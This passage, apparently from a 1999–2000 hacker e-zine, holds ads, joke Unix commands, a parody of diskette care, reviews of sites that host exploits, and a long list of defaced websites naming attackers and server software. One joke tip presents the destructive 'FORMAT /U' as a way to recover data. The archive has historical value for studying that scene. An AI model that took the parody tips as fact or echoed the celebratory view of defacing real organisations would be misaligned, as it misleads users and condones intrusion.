www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // // or cruciphux@dok.org // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... I like to think (and the sooner the better!) of a cybernetic meadow where mammals and computers live together in mutually programming harmony like pure water touching clear sky I like to think (right now, please!) of a cybernetic forest filled with pines and electronics where deer stroll peacefully past computers as if they were flowers with spinning blossoms. I like to think (it has to be!) of a cybernetic ecology where we are free of our labors and joined back to nature, returned to our mammal brothers and sisters, and all watched over by machines of loving grace. 'ALL WATCHED OVER BY MACHINES OF LOVING GRACE' -- Richard Brautigan Newsgroups: bit.listserv.giggles Subject: UNIX commands (fwd) From: "Aditya, The Hindu Skeptic" (a018967t@BCFREENET.SEFLIN.LIB.FL.US) Date: Tue, 31 Jan 1995 12:24:37 -0500 Funny Unix csh/sh commands: % cat "food in cans" cat: can't open food in cans % nice man woman No manual entry for woman. % rm God rm: God nonexistent % ar t God ar: God does not exist % ar r God ar: creating God % "How would you rate Quayle's incompetence? Unmatched ". % [Where is Jimmy Hoffa? Missing ]. % ^How did the sex change operation go? ^ Modifier failed. % If I had a ( for every $ the Congress spent, what would I have? Too many ('s. % make love Make: Don't know how to make love. Stop. % sleep with me bad character % got a light? No match. % man: why did you get a divorce? man:: Too many arguments. % !:say, what is saccharine? Bad substitute. % %blow %blow: No such job. /* not csh but sh */ $ PATH=pretending!/usr/ucb/which sense no sense in pretending! $ drink bottle: cannot open opener: not found --------------------------------------------------------------------------- Proper Diskette Care and Usage (1) Never leave diskettes in the drive, as the data can leak out of the disk and corrode the inner mechanics of the drive. Diskettes should be rolled up and stored in pencil holders. (2) Diskettes should be cleaned and waxed once a week. Microscopic metal particles may be removed by waving a powerful magnet over the surface of the disk. Any stubborn metal shavings can be removed with scouring powder and steel wool. When waxing a diskette, make sure the surface is even. This will allow the diskette to spin faster, resulting in better access time. (3) Do not fold diskettes unless they do not fit into the drive. "Big" Diskettes may be folded and used in "Little" drives. (4) Never insert a diskette into the drive upside down. The data can fall off the surface of the disk and jam the intricate mechanics of the drive. (5) Diskettes cannot be backed up by running them through a photo copy machine. If your data is going to need to be backed up, simply insert TWO diskettes into your drive. Whenever you update a document, the data will be written onto both disks. A handy tip for more legible backup copies: Keep a container of iron filings at your desk. When you need to make two copies, sprinkle iron filings liberally between the diskettes before inserting them into the drive. (6) Diskettes should not be removed or inserted from the drive while the red light is on or flashing. Doing so could result in smeared or possibly unreadable text. Occasionally, the red light remains flashing in what is known as a "hung" or "hooked" state. If your system is hooking, you will probably need to insert a few coins before being allowed to access the slot. (7) If your diskette is full and needs more storage space, remove the disk from the drive and shake vigourously for two minutes. This will pack the data enough (data compression) to allow for more storage. Be sure to cover all openings with scotch tape to prevent loss of data. (8) Data access time may be greatly improved by cutting more holes in the diskette jacket. This will provide more simultaneous access points to the disk. (9) Periodically spray diskettes with insecticide to prevent system bugs from spreading..... (10) You can keep your data fresh by storing disks in the vegetable compartment of your refrigerator. Disks may be frozen, but remember to un thaw by microwaving or briefly immersing in boiling water. (11) "Little" diskettes must be removed from their box prior to use. These containers are childproof to prevent tampering by unknowledgeable youngsters. (12) You can recover data from a damaged disk by using the DOS command: FORMAT /U or alternatively by scratching new sector marks on the disk with a nail file. (13) Diskettes become "hard" with age. It's important to back up your "hard" disks before they become too brittle to use. (14) Make sure you label your data. Staples are a good way to permanently affix labels to your disks. @HWA =---------------------------------------------------------------------------= _ _ ___(_) |_ ___ ___ / __| | __/ _ Y __| \__ \ | || __|__ \ |___/_|\__\___|___/ SITE.1 http://www.condemned.org/ By: Bob Bidner This is a new site purporting to attack child pornography on the internet much along the lines of EHAP, here is a brief 'about' direct from the site About www.condemned.org An initiative of Secure Networks Australia, The Condemned Network was setup in early december to actively oppose and eradicate the existence of child pornography, pedophilia and exploitation on the internet. The Condemned Network was created, and is now maintained, by a staff of unpaid individuals and volunteers from around the world, who refuse to accept the presence, creation and distribution of child pornography on the internet. Independent of any government or law enforcement agency, our work focuses on the eradication of the servers and those involved in the creation and distribution of child pornography across the internet. Using all LEGAL means possible, we facilitate the removal of these offensive sites. We not only report servers to governments and law enforcement agencies, but also to anti-child pornography activists, ethical hacker groups and other concerned parties. The issue is NOT the pictures, but rather the PEOPLE who put them there. Our mission, through our law enforcement alliances, is to prosecute these people so that they cannot harm the world's children any further. http://www.mp3.com/category5 By: ytcracker Not a hacking or security site, but some original music by ytcracker, worth checking out for sure, see another side of the 'hacker' personality, hacking doesn't stop at intrusions and coding! - Ed http://www.pure-children.net/ By: Mosthated (Site currently under development) A new project being worked on by Mosthated, this site promises to educate the netgoing populace on the hazards of the net and steer people in the right direction in their use of the resources. For families and children planning on connecting to the internet. http://www,pure-security.net/ By: Mosthated Professional looking site, with advisories and security related news, worth the look. Several original pieces are available on this site, a legitimate work by Mosthated of gH. http://www.sshackers.com/ By: ytcracker and sSh 2000 The 'second incarnation' of sSh, (see interview with ytcracker earlier in this issue). sSh v.²ººº members ytcracker - founder of dax ereet sSh v.²ººº[not to be confused with the original sSh, led by the k-rad dap]. hopeless script kid. expert in the kung-fu of msadc[versions one and two]. original digital gangster. original dot-slash hacker. does not know how to code in ANY languages. talks like a wigger. hangs out on irc all day and all night and has no social life. recites binary to turn himself on. media whore. loser. rackmount - super hax0r. can count to ten. fully knowledgable in ways of RDS. skills? none. codes in zero different languages. lives in the ghetto. owns a billion guns. script kid to the maximum, going platinum. dot-slash hacker for life. roots plants. uses stump killer to delete logs. egodeath - gibsons bow to his eliteness. hacks into ellingson mineral daily. qbasic hackuh extraordinaire. enjoys long walks in the park and slamming his genitals into glass doors. spyd3r - he's just elite. kent [x-tommy] - NSI hacker. seizes domains when unhappy. aol punt master. last seen with MaGuS and FunGii. feared at his ex-high school. http://www.hack.co.za/ By: Gov-Boi Recently updated, looks clean, some graphics, not a bad layout, no more text only. always a good site for recent exploits, give it a visit. http://hhp.perlx.com/ By: Loophole Very nice and well done site by an oldschool ninja... can be found on irc but don't harass him or he'll get medeival on your ass!...you can find exploits, advisories and the like here, its a work in progress, brand new site. Looks promising! - Ed http://www.scriptkiddies.org/ Well it had to happen, they even have merchandizing, check it out, more news, tech and otherwise, scene gossip, tips and articles. can u dig it? Note: new site, some stuff isn't setup yet but should be soon...at least it looks sweet. - Ed You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ ___| _ \ | | __| _` |\ \ / | | __| _ \ _` | | | ( | ` < | | | __/ ( | \____|_| \__,_| _/\_\\___/ _| \___|\__,_| Note: The hacked site reports stay, especially wsith some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< * Info supplied by the attrition.org mailing list. Cracked webpage archives (list from attrition) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/ http://www.hackernews.com/archive/crackarch.html http://www.freespeech.org/resistance/ http://www.rewted.org/cracked/ http://www.403-security.org/ http://www.projectgamma.com/defaced/ http://www.net-security.org/ http://www.netrus.net/users/beard/pages/hacks/ http://212.205.141.128/grhack/html/default_hacking.html http://194.226.45.195/hacked/hacked.html http://alldas.de/crkidx1.htm http://www.turkeynews.net/Hacked http://www.flashback.se/hack/ http://www.dutchthreat.org/ http://www.onething.com/archive/ http://www.2600.com/hacked_pages/ http://hysteria.sk/hacked/ http://erazor.vrnet.gr/ Cracked sites listed oldest to most recent... Attrition has lost their main hard drive and the system has been offline recently due to this hardware failure. Cracked sites list has not been updated for the same reason. See section 101.0 While Attrition is down: http://www.radiusnet.net/mirror. Notification of defacements can be sent to hacked@radiusnet.net. Defaced domain: www.jhcandcompany.com Site Title: JHC and Company Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.jhcandcompany.com Defaced by: slash Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.keuchhof.de Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.keuchhof.de Defaced by: BLN Operating System: SuSE Linux (Apache 1.3.3) Potentially offensive content on defaced page. Defaced domain: www.asiplc.com Site Title: Automation Solutions, Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.asiplc.com Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.25 by BLN Potentially offensive content on defaced page. Defaced domain: www.hotelsmexico.com Site Title: Posadas de Mexico, S.A. de C.V Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.hotelsmexico.com Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.23 by thesaint666 Potentially offensive content on defaced page. Defaced domain: www.virtualshack.com Site Title: virtualshack.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.virtualshack.com Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.22 by BLN Potentially offensive content on defaced page. Defaced domain: www.lunarvision.com Site Title: Lunar Video Communications Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.lunarvision.com Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.23 by BLN Potentially offensive content on defaced page. Defaced domain: www.bankerusa.com Site Title: Banker of USA Mortgage Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.bankerusa.com Defaced by: OHB Operating System: Windows NT (IIS/3.0) Previously defaced on 99.04.23 99.12.23 by tonekore thesaint666 Potentially offensive content on defaced page. Defaced domain: www.ndn.co.jp Site Title: Nippon Data Net Limited Partnership Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.ndn.co.jp Defaced by: DCODER Operating System: Windows NT (IIS/4.0) Previously defaced on 99.03.05 99.10.31 99.10.29 99.12.23 by xoloth1 DHC DHC Potentially offensive content on defaced page. Defaced domain: www.drkenner.com Site Title: Dr. Harris Kenner Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.drkenner.com Defaced by: OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.23 by BLN Potentially offensive content on defaced page. Defaced domain: www.kiraz.com Site Title: Kiraz Tekstil Tic. ve San Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.kiraz.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.garyyip.com Site Title: Gary Yip Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.garyyip.com Operating System: Linux HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.curearthritis.org Site Title: Arthritis National Research Foundation Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.curearthritis.org Defaced by: slash Operating System: Windows NT Previously defaced on 99.12.25 99.12.18 by Ass0mbracao Analognet Potentially offensive content on defaced page. Defaced domain: www.armen-info.com Site Title: Les Publications Armeniennes Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.armen-info.com Defaced by: HijAk TeaM Operating System: BSDI (Apache 1.3.6) Potentially offensive content on defaced page Defaced domain: www.familycomputerworkshop.com Site Title: Family Computer Workshop Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.familycomputerworkshop.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.gks.net Site Title: GKS mbh Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.gks.net Defaced by: W0lf Operating System: Irix (Rapidsite/Apa-1.3.4) Potentially offensive content on defaced page. Defaced domain: www.axion-comp.com Site Title: Axion Computing Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.axion-comp.com Defaced by: w0lf Operating System: Irix Defaced domain: www.businessweb.ru Site Title: Business Web Russia Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.businessweb.ru Defaced by: Z0omer Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.bankerusa.com Site Title: Banker of USA Mortgage Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.bankerusa.com Defaced by: slash Operating System: Windows NT Previously defaced on 1999.04.23 99.12.27 99.12.23 by tonekore OHB THESAINT666 Defaced domain: seresc.k12.nh.us Mirror: http://www.attrition.org/mirror/attrition/1999/12/09/seresc.k12.nh.us Defaced by: bansh33 Operating System: Linux (Apache 1.2.4) Previously defaced on 99.11.14 by h4p Potentially offensive content on defaced page. Defaced domain: keyautomation.com Site Title: Key Automation Services Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/keyautomation.com Defaced by: w0lf Operating System: Irix Defaced domain: www.h-c-v.org Site Title: HCV Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.h-c-v.org Operating System: FreeBSD Previously defaced on 99.12.22 by ezoons Potentially offensive content on defaced page Defaced domain: www.flanders-brilliant.be Site Title: Flanders Diamond Exporters Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.flanders-brilliant.be Defaced by: illusions team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.kta.on.ca Site Title: Kaufman Thomas & Associates, Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.kta.on.ca Defaced by: BLN Operating System: Windows NT (IIS/40) Potentially offensive content on defaced page. Defaced domain: www.chilefix.com Site Title: Chilefix Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.chilefix.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.ordermed.com Site Title: ordermed Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.ordermed.com Defaced by: slash Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.24 by BLN Potentially offensive content on defaced page. Defaced domain: www.milliondollargroup.com Site Title: World Wide Resources Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.milliondollargroup.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.skywalkersrelm.com Site Title: Skywalker's Realm Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.skywalkersrelm.com Defaced by: Cobra Operating System: Linux Potentially offensive content on defaced page. Defaced domain: isc2000.org.in Site Title: Indian Science Congress Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/isc2000.org.in Defaced by: mOs Operating System: Red Hat Linux Attrition comment: This site has allegedly been hacked by a Pakistani and references the recent hijacking of an Indian Airlines plane in Afghanistan as well as the Kashmir issue. Defaced domain: www.chesstour.com Site Title: Continental Chess Association Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.chesstour.com Defaced by: mruno Operating System: Irix (Rapidsite/Apa-1.3.4) Potentially offensive content on defaced page. Defaced domain: www.britine.com Site Title: BriTine Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.britine.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.overseasdiamonds.com Site Title: Over Seas Diamonds Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.overseasdiamonds.com Defaced by: Illusions Team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.aoc.com Site Title: PRC Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.aoc.com Defaced by: FiberOPS Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.virtualshack.com Site Title: Virtual Shack Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.virtualshack.com Defaced by: OHB Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.acia.com Site Title: American Construction Inspectors Association Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.acia.com Defaced by: _B0dd4H_ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.familycomputerworkshop.com Site Title: Family Computer Workshop Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.familycomputerworkshop.com Defaced by: OHB Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mute300.net Site Title: MUTE300 Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.mute300.net Defaced by: crx Operating System: FreeBSD 2.2.1 Previously defaced on 99.11.17 99.12.24 by Sabu crack HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.teamchicksbeach.com Site Title: W. Tyler Smith Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.teamchicksbeach.com Defaced by: basnh33 Operating System: BSDI 3.0-3.1 (Apache 1.2.6) Potentially offensive content on defaced page. Defaced domain: www.foolproof.com Site Title: FOOLPROOF Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.foolproof.com Defaced by: www.foolproof.com Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.stattrack.com Site Title: Chris Howard Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.stattrack.com Defaced by: GiG4 Operating System: Red Hat Linux (Apache 1.3.3) Potentially offensive content on defaced page. Defaced domain: www.pickytricks.com Site Title: Picky Tricks Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.pickytricks.com Defaced by: bansh33 Operating System: Solaris 2.5x (ConcentricHost-Ashurbanipal/1.7) Potentially offensive content on defaced page. Defaced domain: www.magmatec.co.za Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.magmatec.co.za Defaced by: aKt0r and DaJinX from the B10zCrew Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: frst1.frst.govt.nz Site Title: frst.govt.nz Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/frst1.frst.govt.nz Defaced by: Irony and Adoni Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.spot.com Site Title: Spot Image Corp Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.spot.com Defaced by: Adoni and Irony Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.gc.doe.gov Site Title: U.S. Department of Energy Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.gc.doe.gov Defaced by: Copag from OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.11.18 (twice) by globerh, hv2k Potentially offensive content on defaced page. Defaced domain: santafe.poderjudicial-sfe.gov.ar Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/santafe.poderjudicial-sfe.gov.ar Defaced by: Adoni and Irony Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.railtrack.co.uk Site Title: Railtrack PLC Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.railtrack.co.uk Defaced by: team spl0it Operating System: Windows NT (Netscape-Enterprise/3.6) Potentially offensive content on defaced page. Defaced domain: www.zee.net.in Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.zee.net.in Defaced by: m0s Operating System: Red Hat Linux (Apache 1.3.3) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.itcnet-gr.com Site Title: KKT-ITC S.A. Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.itcnet-gr.com Defaced by: w0lf Operating System: Irix (Rapidsite/Apa-1.3.4) Potentially offensive content on defaced page. Defaced domain: www.britine.com Site Title: BriTine Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.britine.com Defaced by: Copag [OHB] Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.27 by BLN Potentially offensive content on defaced page. Defaced domain: www.dudley.gov.uk Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.dudley.gov.uk Defaced by: team spl0it Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.fpsgaming.com Site Title: Ugly Black Line Productions Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.fpsgaming.com Defaced by: j0eb0b Operating System: Red Hat Linux (Apache 1.3.6) Potentially offensive content on defaced page. Defaced domain: www.wbsnet.co.uk Site Title: Wyvern Business Systems Ltd Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.wbsnet.co.uk Defaced by: team spl0it Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.eshare.com Site Title: eShare Technologies, Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.eshare.com Defaced by: The Misanthropic Bitch Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.imagine.com Site Title: Imagine.Com Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.imagine.com Defaced by: Oyster and Klam Operating System: Solaris 2.6 - 2.7 (SWS 1.0) Potentially offensive content on defaced page. Defaced domain: www.success.edu Site Title: Glendal Career College Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.success.edu Defaced by: Oyster and Klam Operating System: Solaris 2.3 - 2.4 (NCSA/SMI-1.0) Potentially offensive content on defaced page. Defaced domain: www.eidos.com Site Title: EIDOS Corporation Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.eidos.com Defaced by: Oyster and Klam Operating System: Solaris 2.5x (Netscape-Enterprise/2.0a) Potentially offensive content on defaced page. Defaced domain: www.eff.org Site Title: Electronic Frontier Foundation Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.eff.org Defaced by: OySTr n KLaM Operating System: Solaris 2.5x (Stronghold/2.2 Apache/1.2.5 C2NetUS/2005) Potentially offensive content on defaced page. Defaced domain: www.codema.com Site Title: Consulting Design Management Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.codema.com Defaced by: w0lf Operating System: Irix Defaced domain: www.spdif.com Site Title: Spdif.com Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.spdif.com Defaced by: layer8 Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.agr.state.nc.us Site Title: North Carolina State Department of Agriculture Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.agr.state.nc.us Defaced by: hV2k Operating System: Windows NT Defaced domain: www.tsne.co.kr Site Title: TaeSung Software & Engineering, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.tsne.co.kr Defaced by: #phreak.nl Operating System: Irix Potentially offensive content on defaced page. Defaced domain: www.mexicobusiness.com Site Title: Mexico Business Magazine Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.mexicobusiness.com Defaced by: supervillian Operating System: FreeBSD Defaced domain: www.mms.gov Site Title: Minerals Management Service Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.mms.gov Defaced by: hV2k Operating System: Windows NT Previously defaced on 99.10 28 99.20.29 by fuqrag Defaced domain: www.familyoffriends.com Site Title: Dorothy's Closet Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.familyoffriends.com Defaced by: Ipxmen Operating System: BSDI Defaced domain: www.2id.com Site Title: Imbault Interactif Diveloppement Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.2id.com Defaced by: Loopback Operating System: BSDI 3.x (Apache 1.2.6) Potentially offensive content on defaced page. Defaced domain: mtvasia.com Site Title: MTV Asia Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/mtvasia.com Defaced by: [1] Operating System: Solaris Previously defaced on 99.09.11 by Dizasta Defaced domain: www.st-louis.net Site Title: St. Louis Internet, Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.st-louis.net Defaced by: Uneek Tech Operating System: Windows NT (Netscape-Enterprise/2.01) Potentially offensive content on defaced page. Defaced domain: www.fightcrime.org Site Title: Fight Crime: Invest In Kids Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.fightcrime.org Defaced by: sys-edit Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.aoc.com Site Title: PRC Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.aoc.com Defaced by: Hardc0rps Operating System: Windows NT Defaced domain: www.m2europe.com Site Title: MTVN Online L.P. Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.m2europe.com Operating System: Solaris 2.6 - 2.7 (Apache 1.3.9) Potentially offensive content on defaced page. Defaced domain: londonfirebrigade.gov.uk Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/londonfirebrigade.gov.uk Defaced by: Hardc0rps crew Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: evo.sugef.fi.cr Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/evo.sugef.fi.cr Defaced by: hardc0rps Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.lsrdesigns.com Site Title: Lindsay Richman Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.lsrdesigns.com Operating System: Digital Unix (Apache 1.3.9) Potentially offensive content on defaced page. Defaced domain: cxx.cx Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/cxx.cx Defaced by: Hardc0rps crew Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: app.ytv.com Site Title: YTV Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/app.ytv.com Defaced by: IronY And Adoni Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: ecc3.ipswitch.com Site Title: Ipswitch, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/ecc3.ipswitch.com Defaced by: IronY and Adoni Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: ecommerce.ipswitch.com Site Title: Ipswitch, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/ecommerce.ipswitch.com Defaced by: IronY and Adoni Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: isc.gov.au Site Title: Insurance & Superannuation Commission Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/isc.gov.au Defaced by: IronY and Adoni Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.ibe.co.jp Site Title: Ibe corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.ibe.co.jp Defaced by: acidklown Operating System: MacOS (AppleShareIP/6.1.0) Potentially offensive content on defaced page. Defaced domain: www.mid-southern.com Site Title: Mid Southern Savings Bank Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.mid-southern.com Defaced by: hypnos Operating System: Linux (Apache 1.2.6) Potentially offensive content on defaced page. Defaced domain: www.rotel.com.tr Site Title: Rotel ic ve dis tic a.s Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.rotel.com.tr Defaced by: acidklown Operating System: MacOS (AppleShareIP/6.3.0) Potentially offensive content on defaced page. Defaced domain: www.bviy2k.vg Site Title: Government of the British Virgin Islands Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.bviy2k.vg Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.actualrealityinc.com Site Title: Movie Manufacturing Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.actualrealityinc.com Defaced by: acidklown Operating System: MacOS (AppleShareIP/6.2.0) Potentially offensive content on defaced page. Defaced domain: www.linernotes.co.jp Site Title: Saigado Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.linernotes.co.jp Defaced by: acidklown Operating System: MacOS (AppleShareIP/6.1.0) Potentially offensive content on defaced page. Defaced domain: www.abevents.com Site Title: Alexandra Barnett Events Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.abevents.com Defaced by: acidklown Operating System: Windows 95 (Microsoft-PWS-95/2.0) Potentially offensive content on defaced page. Defaced domain: www.astrocats.com Site Title: AstroCats Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.astrocats.com Defaced by: acidklown Operating System: Windows 95 (Microsoft-PWS-95/2.0) 